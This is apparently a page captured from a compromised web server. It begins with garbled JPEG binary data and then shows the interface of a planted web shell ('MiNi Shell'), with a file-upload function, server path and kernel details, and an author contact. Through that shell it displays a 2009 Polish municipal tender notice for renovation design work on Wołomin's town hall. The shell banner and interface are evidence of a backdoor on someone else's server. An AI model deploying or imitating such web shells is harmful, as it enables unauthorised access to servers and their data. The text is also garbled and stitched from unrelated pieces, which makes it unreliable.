JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090225/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090225/41388-N-2009.html

<p class="kh_header"><b>Wołomin: OPRACOWANIE KOMPLEKSOWEJ DOKUMENTACJI PROJEKTOWEJ BUDOWLANO-WYKONAWCZEJ DLA POTRZEB REMONTU BUDYNKU URZĘDU MIEJSKIEGO W WOŁOMINIE</b><br>
<b>Numer ogłoszenia: 41388 - 2009; data zamieszczenia: 25.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wołomin , ul. Ogrodowa 4, 05-200 Wołomin, woj. mazowieckie, tel. 02 7633000, faks 022 7633066.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.wolomin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIE KOMPLEKSOWEJ DOKUMENTACJI PROJEKTOWEJ BUDOWLANO-WYKONAWCZEJ DLA POTRZEB REMONTU BUDYNKU URZĘDU MIEJSKIEGO W WOŁOMINIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1 Przedmiotem zamówienia jest:
Opracowanie kompleksowej dokumentacji projektowej budowlano-wykonawczej dla budynku Urzędu Miejskiego w Wołominie w następującym zakresie:
Ekspertyza techniczna pęknięć na słupach podtrzymujących salę konferencyjną nr 106.
Projekt budowlany, wykonawczy i architektoniczno-konstrukcyjny dobudowy zewnętrznej klatki schodowej, stanowiącej wspólne wejście do Biura Obsługi Mieszkańców i sali konferencyjnej nr 106 na I piętrze.
Projekt budowlany i wykonawczy przebudowy i aranżacji sali konferencyjnej nr 106.
Projekt budowlany i wykonawczy przebudowy i aranżacji głównego wejścia oraz holu.
Kosztorysy inwestorskie i przedmiary robót.

2 W zakres robót  wchodzi wykonanie następujących opracowań:
I. Mapa do celów projektowych - w ilości egzemplarzy niezbędnej do wykonania projektu. 
II. Wykonanie ekspertyzy w celu wyjaśnienia przyczyn powstawania pęknięć na słupach podtrzymujących salę konferencyjną nr 106 wraz z wykonaniem projektu konstrukcyjnego ewentualnych napraw - 2 egz. + 1 egz. w wersji elektronicznej (MS Word i pdf)
III. Zaprojektowanie zewnętrznej klatki schodowej od strony ul. Ogrodowej
Projekt koncepcyjny dobudowy zewnętrznej klatki schodowej, od strony ul. Ogrodowej, stanowiącej wspólne wejście do Biura Obsługi Mieszkańców oraz sali konferencyjnej nr 106 - 3 wersje;
Projekt budowlany, wykonawczy i architektoniczno-konstrukcyjny zewnętrznej klatki schodowej stanowiącej wejście do B.O.M i sali konferencyjnej nr 106 wraz z  uzgodnieniami - 6 egz. + 1 egz. w wersji elektronicznej (pdf i autocad).
Projekt aranżacji wejścia, holu i klatki schodowej - 3 egz. + 1 egz. w wersji elektronicznej  (pdf i autocad),  zawierający:
- aranżacje wejścia - opisy na rzutach, kolorystyka
- rzut posadzki - opisy na rzutach, kolorystyka, bilanse 
- rzut sufitu - opisy na rzutach, bilanse
- opracowanie każdej ściany - rzut z opisami, kolorystyka, oddzielne wydruki każdej ściany: opis, wymiarowanie,    ewentualne detale, opracowanie na rzutach i widokach ścian podziałów kamienia, gresu, szkła itp.
- wykaz stolarki .
- projekt wykonawczy instalacji elektrycznej - 6 egz. + 1 egz. w wersji elektronicznej (pdf i autocad).
IV. Przebudowa i aranżacja sali konferencyjnej nr 106
Projekt koncepcyjny (3 wersje), budowlany i wykonawczy sali nr 106 - 6 egz. + 1 egz. w wersji elektronicznej (pdf i autocad).
Projekt architektoniczno-konstrukcyjny sali nr 106 - 6 egz. + 1 egz. w wersji elektronicznej (pdf i autocad).
Projekt aranżacji sali konferencyjnej nr 106 - 3 egz. + 1 egz. w wersji elektronicznej (pdf i autocad), zawierający:
- aranżacje wnętrz - meble, opisy na rzutach,
- rzut posadzki - opisy na rzutach, bilanse, kolorystyka
- rzut sufitu podwieszonego - opisy na rzutach, bilanse
- opracowanie każdej ściany - rzut z opisami, oddzielne wydruki każdej ściany: opis, wymiarowanie, ewentualne   detale, opracowanie na rzutach i widokach ścian podziałów kamienia, gresu, itp.
- wykaz stolarki 
- wykaz oświetlenia - rzuty i opisy, bilanse
- wykaz nagłośnienia - rzuty i opisy, bilanse
Projekt budowlano-wykonawczy instalacji wentylacji nawiewno-wywiewnej dla potrzeb sali konferencyjnej nr 106;
Projekt budowlano-wykonawczy instalacji klimatyzacji dla potrzeb sali konferencyjnej nr 106;
Projekt budowlano-wykonawczy instalacji nagłośnieniowej dla potrzeb sali konferencyjnej nr 106;
Projekt budowlano-wykonawczy instalacji elektrycznej i oświetleniowej dla potrzeb sali konferencyjnej nr 106;
Projekt budowlano-wykonawczy rozbiórki klatki schodowej przy sali konferencyjnej nr 106 (wyburzenie klatki i uzupełnienie stropu)
- po 6 egz. + 1 egz. w wersji elektronicznej (pdf i autocad).
V.  Przebudowa i aranżacja głównego wejścia oraz holu.
Projekt koncepcyjny przebudowy głównego wejścia - 3 wersje;
Projekt budowlany, wykonawczy i architektoniczno-konstrukcyjny głównego wejścia wraz z  uzgodnieniami - 6 egz. + 1 egz. w wersji elektronicznej (pdf i autocad).
Projekt aranżacji głównego wejścia i holu - 3 egz. + 1 egz. w wersji elektronicznej  (pdf i autocad),  zawierający:
- aranżacje wejścia i holu - opisy na rzutach, kolorystyka
- rzut posadzki - opisy na rzutach, kolorystyka, bilanse 
- rzut sufitu - opisy na rzutach, bilanse
- opracowanie każdej ściany - rzut z opisami, kolorystyka, oddzielne wydruki każdej ściany: opis, wymiarowanie,    ewentualne detale, opracowanie na rzutach i widokach ścian podziałów kamienia, gresu, szkła itp.
- projekt wykonawczy instalacji elektrycznej - 6 egz. + 1 egz. w wersji elektronicznej (pdf i autocad).
VI. Kosztorysy inwestorskie i przedmiary robót oddzielne dla:
1.zewnętrznej klatki schodowej, stanowiącej wspólne wejście do Biura Obsługi Mieszkańców i sali koncepcyjnej nr 106 na I piętrze,
2.przebudowy wraz z branżami i aranżacji sali konferencyjnej nr 106,
3.przebudowy wraz z branżami i aranżacji głównego wejścia i holu.
  
Przedmiar robót wykonany na podstawie dokumentacji określonej w przedmiocie zamówienia - 2 egz. + 1 egz. w wersji elektronicznej (Norma i pdf).

Kosztorys inwestorski wykonany na podstawie dokumentacji określonej w przedmiocie zamówienia - 2 egz. + 1 egz. w wersji elektronicznej (Norma i pdf).

Dokumentacja projektowo-kosztorysowa winna być przekazana Zamawiającemu w formie oprawionych teczek.
Do projektu budowlanego należy dołączyć kopie uprawnień projektantów i sprawdzających oraz zaświadczeń z Izby Inżynierów Budownictwa. 
        Uwaga: Zamawiający dopuszcza podział projektu budowlanego na tomy obejmujące różne branże.
                 Wymagania odnośnie szaty graficznej projektu:
1.nazwa i adres inwestora,
2.nazwa i adres jednostki projektowej,
3.imię i nazwisko projektanta i sprawdzającego,
4.skala, numeracja stron, układ książkowy.   
2.3 Zamawiający posiada:
1. Decyzję nr PZ.5580-1-8/1/2006 Komendanta Powiatowego PSP w Wołominie.
2. Dokumentację projektową wykonaną przez firmę BP-U ELHAN Sp. z o.o. z Warszawy, tym:
Projekt wykonawczy. Architektura i Konstrukcja - autorzy: K. Stańczyk, J. Niedźwiecki, A. Bartkowicz, sprawdzający: G. Konarska, K. Olczak;
Dokumentacja odtworzeniowa - inwentaryzacja budowlana , K. Korzuchowski, sprawdził K.Stańczyk;
Inwentaryzację instalacji wodociągowej, bytowej, przeciwpożarowej hydrantowej, centralnej ciepłej wody z cyrkulacją, kanalizacji sanitarnej - S. Karaś, sprawdzający H. Piasecka;
Inwentaryzacja budowlana - instalacje elektryczne - E. Lewandowski;
Projekt wykonawczy wymiany instalacji c.o. - H. Piasecka, B. Omilianowicz, sprawdzający B. Uchmańska - Rafa;
Projekt wykonawczy wymiany instalacji elektrycznych - E. Lewandowski, sprawdzał inż. C. Styś;
Ocena stanu technicznego budynku Urzędu Miejskiego w Wołominie - Z. Kawecki;
Projekt budowlano - wykonawczy instalacji elektrycznych w modernizowanej części budynku Urzędu Miejskiego w Wołominie - parter (BOI), projekt S.Guzek;
Ekspertyza w zakresie ochrony przeciwpożarowej,  mł. bryg. w st. spocz. mgr inż. Zbigniew Szymański, rzeczoznawca do spraw zabezpieczeń przeciwpożarowych nr upr. 43/93 i mgr inż. arch. Zdzisław Kułakowski, rzeczoznawca budowlany d/s architektury nr upr. 31/96.
3. Projekt Techniczny. Instalacja systemu sygnalizacji pożaru i sterowania oddymianiem klatki schodowej w budynku Urzędu Miejskiego w Wołominie - aktualizacja powykonawcza, wykonany przez PHU KONKRET 35-060 Rzeszów ul. Słowackiego 24/19.
Zamawiający nie posiada powyższej dokumentacji w wersji elektronicznej.
Ww. dokumentacja znajduje się w Wydziale Inwestycji tut. Urzędu w pok. 208, gdzie istnieje możliwość udostępnienia jej do wglądu.

4 Wymagania dodatkowe.
4.1 Wykonawcy zaleca się dokonanie wizji na terenie obiektu Urzędu Miejskiego w Wołominie przy ul. Ogrodowej 4.
4.2 Przy wykonywaniu w/w prac projektowych należy uwzględnić zainstalowany system Sygnalizacji Alarmu Pożaru i oddymiania głównej klatki schodowej w budynku Urzędu Miejskiego.
4.3 Dokumentacja projektowo - kosztorysowa musi być opracowana w sposób zgodny z zasadami współczesnej wiedzy technicznej, obowiązującymi przepisami w tym techniczno - budowlanymi i ochrony środowiska
4.4 Dokumentacja projektowo - kosztorysowa musi posiadać wszelkie wymagane prawem opinie, uzgodnienia, w tym również uzgodnienia międzybranżowe, umożliwiające uzyskanie decyzji o pozwoleniu na budowę oraz innych pozwoleń niezbędnych do realizacji inwestycji.
4.5 Dokumentacja projektowo - kosztorysowa powinna być wykonana w stanie kompletnym z punktu widzenia celu, któremu ma służyć.
4.6 Dokumentacja projektowo - kosztorysowa będzie służyć do opisu przedmiotu zamówienia do przetargu w oparciu o ustawę Prawo Zamówień Publicznych na roboty budowlane oraz realizację pełnego zakresu robót budowlanych na jej podstawie, niezbędnego do ich użytkowania zgodnie z przeznaczeniem.
4.7 Dokumentacja projektowo - kosztorysowa nie może przedmiotu zamówienia opisywać przez wskazanie znaków towarowych, patentów lub pochodzenia, chyba, że jest to uzasadnione specyfikacją przedmiotu zamówienia lub nie można tego opisać za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu towarzyszą wyrazy lub równoważne lub inne równoważne wyrazy.
4.8 Dokumentacja projektowa powinna opisywać przedmiot zamówienia w tym zastosowane materiały i urządzenia za pomocą cech technicznych i jakościowych, przy przestrzeganiu Polskich Norm przenoszących europejskie normy zharmonizowane.
W przypadku braku Polskich Norm przenoszących europejskie normy zharmonizowane uwzględnia się: 
- europejskie aprobaty techniczne,
wspólne specyfikacje techniczne..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości 3.000,00 zł (słownie: trzy tysiące złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni z postępowania na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych ( Dz. U z 2007 r. Nr 223, poz.1655 z póź. zm), a także spełniający warunki, o których mowa w art. 22 ust.1 w/w. ustawy. 1) Posiadają uprawnienia do wykonywania określonej działalności lub czynności objętych przedmiotem zamówienia 
2) Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia a) Wykażą wykonane, a w przypadku świadczeń okresowych lub ciągłych również wykonywane usługi w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie co najmniej 1 zamówienie odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot niniejszego zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie;
b) Wykażą, że mają lub będą mieli do dyspozycji wykwalifikowany personel, który posiada odpowiednie przygotowanie do wykonania zamówienia (tj. przygotowanie w zakresie projektowania: achitektonicznego; sieci, instalacji i urządzeń cieplnych, wentylacyjnych,  wodociągowych i kanalizacyjnych; sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych) oraz posiada odpowiednie uprawnienia budowlane  zgodnie z obowiązującymi przepisami Prawa Budowlanego i zaświadczenia o przynależności do właściwej izby samorządu zawodowego.
3) Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 4) Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia; - opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu - Złożenie przez wykonawcę w ofercie dokumentów i oświadczeń żądanych przez zamawiającego będzie stanowić podstawę oceny spełniania warunków udziału w postępowaniu. Zamawiający przy ocenie ofert bedzie kierował się formuła - spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> I) W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności należy załączyć: a) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. b) Oferta składana przez wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zastosowanie znajduje § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz.U. z 2006 r. Nr 87 poz. 605 z póź.zm.). 
 II. W celu potwierdzenia, że wykonawca spełnia warunek, o którym mowa w art. 22 ust.1 pkt 2 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, należy załączyć: a) wykaz wykonanych a w przypadku świadczeń okresowych lub ciągłych również wykonywane usług            w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej 1 zamówienie odpowiadające swoim rodzajem i wartością dostawom stanowiącym przedmiot niniejszego zamówienia, z podaniem ich wartości, przedmiotu, dat  wykonania i odbiorców wraz z załączeniem dokumentów potwierdzających, że dostawy te zostały wykonane należycie (np.  referencje, protokół odbioru końcowego, itp.)
b) wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć                  w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia                      i wykształcenia, niezbędnych do wykonania zamówienia tj. posiadają odpowiednie uprawnienia budowlane do projektowania architektonicznego, dróg, sieci, instalacji i urządzeń, wodociągowych i kanalizacyjnych, instalacji i urządzeń elektroenergetycznych - na potwierdzenie Wykonawca załączy odpowiednie  uprawnienia  budowlane oraz  aktualne zaświadczenia o przynależności do odpowiedniej izby samorządu zawodowego, a także zakresu wykonywanych przez nie czynności lub pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, wykonawca wskazał osoby, którymi będzie dysponował. Na potwierdzenie należy dołączyć uprawnienia, zaświadczenia o wpisie do izby.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.um.wolomin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Wołominie, ul. Ogrodowa 4, pok. 223.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.03.2009 godzina 10:00, miejsce: Urząd Miejski w Wołominie, ul. Ogrodowa 4, Biuro Obsługi Mieszkańców stanowiska kancelaryjne numer: 1, 2, 3.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com